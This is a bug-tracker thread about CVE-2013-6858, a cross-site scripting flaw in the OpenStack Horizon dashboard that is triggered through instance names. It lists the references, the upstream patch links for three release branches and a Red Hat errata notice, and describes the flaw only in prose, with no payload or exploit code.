Common Vulnerabilities and Exposures assigned an identifier CVE-2013-6858 to the following vulnerability: Name: CVE-2013-6858 URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6858 Assigned: 20131123 Reference: https://bugs.launchpad.net/horizon/+bug/1247675 Reference: SECUNIA:55770 Reference: http://secunia.com/advisories/55770 Multiple cross-site scripting (XSS) vulnerabilities in OpenStack Dashboard (Horizon) 2013.2 and earlier allow local users to inject arbitrary web script or HTML via an instance name to (1) "Volumes" or (2) "Network Topology" page.
fix proposed upstream: https://review.openstack.org/#/c/58256/ (it's a backport)
*** Bug 1035907 has been marked as a duplicate of this bug. ***
Icehouse (development branch) fix: https://review.openstack.org/55175 Havana fix: https://review.openstack.org/58465 Grizzly fix: https://review.openstack.org/58820 Description: Cisco PSIRT reported a vulnerability in the OpenStack Horizon dashboard. By embedding HTML tags in an Instance Name, a tenant may execute a script within an administrator's browser resulting in a cross-site scripting (XSS) attack. Only setups using the Horizon dashboard are affected.
Created attachment 833693 [details] cve-2013-6858-master-icehouse.patch
Created attachment 833694 [details] cve-2013-6858-stable-havana.patch
Created attachment 833696 [details] cve-2013-6858-stable-grizzly.patch
for Icehouse and (esp. Havana), packages are already built and fixes are included for a while right now. For grizzly, the patch has not been merged upstream yet.
This issue has been addressed in following products: OpenStack 3 for RHEL 6 Via RHSA-2014:0365 https://rhn.redhat.com/errata/RHSA-2014-0365.html